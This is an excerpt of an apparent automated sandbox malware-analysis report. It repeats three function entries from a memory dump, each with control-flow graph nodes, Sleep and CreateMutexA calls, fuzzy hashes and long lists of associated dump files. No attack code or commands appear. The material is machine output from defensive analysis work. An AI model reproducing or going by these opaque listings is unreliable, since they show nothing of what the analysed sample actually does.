                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                            • Opcode ID: c20dcefd6b9fee58e54e0b94c550b422909e1d87853a4eaabe4a7c84e9c8eea0
                                                                                                                                                                                            • Instruction ID: 9f21b75ad70862a4e021f24c220dd03bc988a320acca623b4a5fe7e954868804
                                                                                                                                                                                            • Opcode Fuzzy Hash: c20dcefd6b9fee58e54e0b94c550b422909e1d87853a4eaabe4a7c84e9c8eea0
                                                                                                                                                                                            • Instruction Fuzzy Hash: AB3128316002449BFF0CABBCDC89B6DBB62FBC6320F284618E015D76D1D77599808792

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 343 89a418-89a438 347 89a43a-89a446 343->347 348 89a466-89a482 343->348 351 89a448-89a456 347->351 352 89a45c-89a463 call 8ad663 347->352 349 89a4b0-89a4cf 348->349 350 89a484-89a490 348->350 355 89a4fd-89a916 call 8a80c0 349->355 356 89a4d1-89a4dd 349->356 353 89a492-89a4a0 350->353 354 89a4a6-89a4ad call 8ad663 350->354 351->352 357 89a93f-89a949 call 8c6c6a * 2 351->357 352->348 353->354 353->357 354->349 362 89a4df-89a4ed 356->362 363 89a4f3-89a4fa call 8ad663 356->363 374 89a94e-89a994 call 8c6c6a Sleep CreateMutexA 357->374 375 89a949 call 8c6c6a 357->375 362->357 362->363 363->355 379 89a9a7-89a9a8 374->379 380 89a996-89a998 374->380 375->374 380->379 381 89a99a-89a9a5 380->381 381->379
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0089A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,008F3254), ref: 0089A981
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                            • Opcode ID: 4bf172eaa0701beeac8b94faec8b75ffc279b989a1180fa3123d5eb794cf1b72
                                                                                                                                                                                            • Instruction ID: 9acbd73e7f2d0bc61ed52535c378028c61f0174b82bfe7409891f0043bae8935
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bf172eaa0701beeac8b94faec8b75ffc279b989a1180fa3123d5eb794cf1b72
                                                                                                                                                                                            • Instruction Fuzzy Hash: 603127316402449BEF0CAB7CDDC9B6DBA62FBC2324F284218E025DB6D5DB7599808697

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 383 89a54d-89a56d 387 89a59b-89a5b7 383->387 388 89a56f-89a57b 383->388 391 89a5b9-89a5c5 387->391 392 89a5e5-89a604 387->392 389 89a57d-89a58b 388->389 390 89a591-89a598 call 8ad663 388->390 389->390 393 89a944-89a949 call 8c6c6a 389->393 390->387 395 89a5db-89a5e2 call 8ad663 391->395 396 89a5c7-89a5d5 391->396 397 89a632-89a916 call 8a80c0 392->397 398 89a606-89a612 392->398 410 89a94e-89a994 call 8c6c6a Sleep CreateMutexA 393->410 411 89a949 call 8c6c6a 393->411 395->392 396->393 396->395 399 89a628-89a62f call 8ad663 398->399 400 89a614-89a622 398->400 399->397 400->393 400->399 417 89a9a7-89a9a8 410->417 418 89a996-89a998 410->418 411->410 418->417 419 89a99a-89a9a5 418->419 419->417
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0089A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,008F3254), ref: 0089A981
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                            • Opcode ID: 9f5a2f7fd0108dde515855b60bfc8ba6c898650863c2a4aa220a03faec813989
                                                                                                                                                                                            • Instruction ID: b7706bdfc153819c0fa3b6c3ec0c9f2111bcd8f862a3f9e4426f469b3174dc70
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f5a2f7fd0108dde515855b60bfc8ba6c898650863c2a4aa220a03faec813989
                                                                                                                                                                                            • Instruction Fuzzy Hash: CE3115717002048BEF0CABBCDC89B6DBB62FBC5324F288618E015DB6D1D735D9808692

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 421 89a682-89a6a2 425 89a6d0-89a6ec 421->425 426 89a6a4-89a6b0 421->426 427 89a71a-89a739 425->427 428 89a6ee-89a6fa 425->428 429 89a6b2-89a6c0 426->429 430 89a6c6-89a6cd call 8ad663 426->430 435 89a73b-89a747 427->435 436 89a767-89a916 call 8a80c0 427->436 433 89a6fc-89a70a 428->433 434 89a710-89a717 call 8ad663 428->434 429->430 431 89a949 429->431 430->425 439 89a94e-89a994 call 8c6c6a Sleep CreateMutexA 431->439 440 89a949 call 8c6c6a 431->440 433->431 433->434 434->427 442 89a749-89a757 435->442 443 89a75d-89a764 call 8ad663 435->443 453 89a9a7-89a9a8 439->453 454 89a996-89a998 439->454 440->439 442->431 442->443 443->436 454->453 455 89a99a-89a9a5 454->455 455->453
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0089A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,008F3254), ref: 0089A981
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
